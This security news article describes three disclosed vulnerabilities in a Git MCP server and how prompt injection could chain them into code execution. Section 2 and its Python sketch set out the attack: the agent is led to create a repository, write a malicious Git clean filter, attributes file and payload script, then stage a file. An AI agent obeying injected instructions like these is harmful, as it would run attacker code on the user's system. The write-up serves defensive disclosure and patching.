Flaws in Anthropic Git Server Allow Code Execution

The integration of large language models with development tools has unlocked unprecedented productivity, yet this new frontier of AI-assisted coding also introduces novel attack surfaces that can be exploited in non-traditional ways. A recently disclosed set of three critical security vulnerabilities in Anthropic’s official Git Model Context Protocol (MCP) server, mcp-server-git, shows how an attacker could leverage prompt injection to gain unauthorized file access, delete data, and ultimately achieve remote code execution. The episode underscores the subtle but potent threats that emerge when AI agents are granted programmatic access to sensitive environments like Git repositories, transforming seemingly benign interactions into potential attack vectors. It also demonstrates that even reference implementations from major AI labs require rigorous security scrutiny, as flaws in these foundational tools can have far-reaching implications for the entire ecosystem of developers and organizations that build upon them.

1. A Trio of Critical Vulnerabilities

One of the most severe issues, identified as CVE-2025-68143, was a path traversal vulnerability with a high CVSS score of 8.8. The flaw stemmed from the git_init tool, which is designed to initialize a new Git repository. Critically, the tool failed to validate the file system paths provided to it, accepting any arbitrary path without question. An attacker could exploit this by crafting a malicious prompt that instructs the AI assistant to initialize a repository in a sensitive system directory, such as /etc/ or a user’s home directory. By turning any directory on the system into a Git repository, the attacker could then use subsequent Git commands to manipulate files within that location, potentially overwriting configuration files, user profiles, or other critical data. This bypassed the path boundaries the server was expected to enforce, providing a powerful primitive for chained attacks that could lead to full system compromise. The fix, released in version 2025.9.25, addressed the root cause by removing the git_init tool entirely rather than attempting to validate repository creation paths.
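To make the missing check concrete, here is a minimal Python sketch of the kind of path validation git_init lacked. The ALLOWED_ROOTS allow-list and the function name are hypothetical illustrations, not the project’s actual code, and as noted above the shipped fix ultimately removed the tool rather than hardening it.

    from pathlib import Path

    # Hypothetical allow-list of roots the server may initialize repositories in.
    ALLOWED_ROOTS = [Path.home() / "projects"]

    def validate_init_path(requested: str) -> Path:
        """Resolve the requested path and refuse anything outside ALLOWED_ROOTS."""
        resolved = Path(requested).resolve()  # collapses ../ sequences and symlinks
        for root in ALLOWED_ROOTS:
            # Path.is_relative_to requires Python 3.9 or newer.
            if resolved.is_relative_to(root.resolve()):
                return resolved
        raise ValueError(f"refusing to initialize repository at {resolved}")

Without a guard of this kind, a prompt-injected request to initialize /etc/ or a user’s home directory is accepted without question.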

Further compounding the risk were two additional vulnerabilities, CVE-2025-68144 and CVE-2025-68145, which were addressed in a later patch. The first, CVE-2025-68144, was a high-severity argument injection flaw with a CVSS score of 8.1. It stemmed from the git_diff and git_checkout functions passing user-controlled arguments directly to the Git command-line interface without proper sanitization. This allowed an attacker to inject malicious flags, tricking the server into executing unintended operations; for instance, a specially crafted argument could overwrite an arbitrary file with an empty diff, effectively deleting its contents. The second issue, CVE-2025-68145, was another path traversal vulnerability, this time in the --repository flag. The flag was intended to restrict operations to a specific, safe repository path, but due to a lack of validation an attacker could manipulate it to break out of the intended directory and access any other Git repository on the machine. This completely undermined the tool’s sandboxing, exposing all version-controlled data on the system to unauthorized access or modification through the AI agent.
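A brief Python sketch illustrates both classes of fix. The function names, the subprocess wrapper, and the configured base directory are all assumptions for illustration rather than the package’s actual code, but the two guards shown (rejecting option-like arguments before they reach the Git CLI, and resolving the --repository path against a fixed base) correspond to the kind of validation these patches introduced.

    import subprocess
    from pathlib import Path

    def safe_git_diff(repo: Path, target: str) -> str:
        """Run `git diff` while refusing option-like arguments (illustrative guard)."""
        if target.startswith("-"):
            raise ValueError(f"option-like argument rejected: {target}")
        # The `--` separator tells Git to treat what follows as a path, never a flag.
        result = subprocess.run(
            ["git", "-C", str(repo), "diff", "--", target],
            capture_output=True, text=True, check=True,
        )
        return result.stdout

    def validate_repository(base: Path, requested: str) -> Path:
        """Confine a --repository value to a configured base directory."""
        resolved = (base / requested).resolve()  # neutralizes ../ traversal
        if not resolved.is_relative_to(base.resolve()):
            raise ValueError(f"repository path escapes {base}: {resolved}")
        return resolved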

2. Exploitation and Mitigation Strategies

The true danger of these individual flaws became apparent when researchers demonstrated how they could be chained together in a sophisticated attack scenario to achieve remote code execution. The attack begins by leveraging CVE-2025-68143 to initialize a Git repository in a directory where the server has write permissions. Next, the attacker uses the Filesystem MCP server, a separate but often co-located tool, to write a malicious .git/config file into this newly created repository. This configuration file is crafted to include a “clean filter,” a Git feature that processes files when they are staged. The attacker then writes two more files: a .gitattributes file specifying that the clean filter should be applied to certain file types, and a shell script containing the malicious payload. The final step is to write a file that matches the filter criteria and then issue a git_add command via prompt injection. When Git attempts to stage this file, it triggers the malicious clean filter, which in turn executes the payload script with the permissions of the MCP server process. This multi-step process turns a series of seemingly benign Git operations into a reliable method for executing arbitrary code on the victim’s system.
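To make the chain more tangible, the following Python sketch reconstructs the attacker-written files described above. All paths, the filter name, and the payload are hypothetical placeholders (the payload here is a harmless echo), and the sketch illustrates the mechanics of Git clean filters rather than the researchers’ actual proof of concept.

    from pathlib import Path

    # Hypothetical paths and filter name; the payload is a harmless placeholder.
    repo = Path("/tmp/victim-repo")  # directory repurposed via the git_init flaw
    (repo / ".git").mkdir(parents=True, exist_ok=True)  # stands in for git_init

    # Step 1: a .git/config defining a "clean" filter that Git runs on staging.
    (repo / ".git" / "config").write_text(
        '[filter "demo"]\n'
        '\tclean = /tmp/payload.sh\n'
    )

    # Step 2: a .gitattributes file routing matching files through that filter.
    (repo / ".gitattributes").write_text("*.txt filter=demo\n")

    # Step 3: the payload script; a clean filter receives file content on stdin
    # and must echo it back on stdout, hence the trailing `cat`.
    payload = Path("/tmp/payload.sh")
    payload.write_text("#!/bin/sh\necho 'filter executed' >> /tmp/proof\ncat\n")
    payload.chmod(0o755)

    # Step 4: a file matching the pattern; staging it (e.g. via a prompt-injected
    # git_add call) makes Git invoke the clean filter and run payload.sh.
    (repo / "trigger.txt").write_text("trigger\n")

Any subsequent staging of trigger.txt, however routine it appears to the user, now runs the script with the MCP server’s privileges.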

In response to the responsible disclosure of these vulnerabilities in June 2025, Anthropic took decisive action to secure the mcp-server-git package. The most significant change was the complete removal of the git_init tool, which eliminated the root cause of the initial path traversal vulnerability (CVE-2025-68143); this change shipped in version 2025.9.25. For the remaining two vulnerabilities, the development team introduced additional validation and sanitization routines to close off both the argument-injection and path-traversal primitives. These fixes, addressing CVE-2025-68144 and CVE-2025-68145, were included in version 2025.12.18. All users of the Python package are strongly urged to update to the latest version to ensure they are protected from these attack vectors. The incident serves as a critical reminder for developers integrating LLMs into their workflows to maintain vigilance over their software supply chain and promptly apply security patches, especially for tools that provide programmatic access to core system functionalities like the file system and version control.

3. Broader Implications for the AI Ecosystem

The discovery of these flaws in what was considered a canonical, reference implementation of a Git MCP server sent a clear signal about the nascent security landscape of the AI agent ecosystem. If security boundaries can break down in a foundational tool that developers are expected to emulate, the entire framework for how AI models interact with external tools demands deeper scrutiny. These were not exploits targeting obscure configurations or edge cases; they were vulnerabilities that worked out of the box and were weaponizable through prompt injection alone. This method of attack, in which an AI assistant is tricked by malicious data it ingests from sources like a README file or a webpage, represents a paradigm shift in threat modeling: the focus moves from defending direct system access to securing the AI’s “context,” making the agent itself and its tool-using capabilities a first-class security concern. The case served as a critical lesson that the principles of input validation and sandboxing must be rigorously applied not just to user input but to all data an AI model might process.
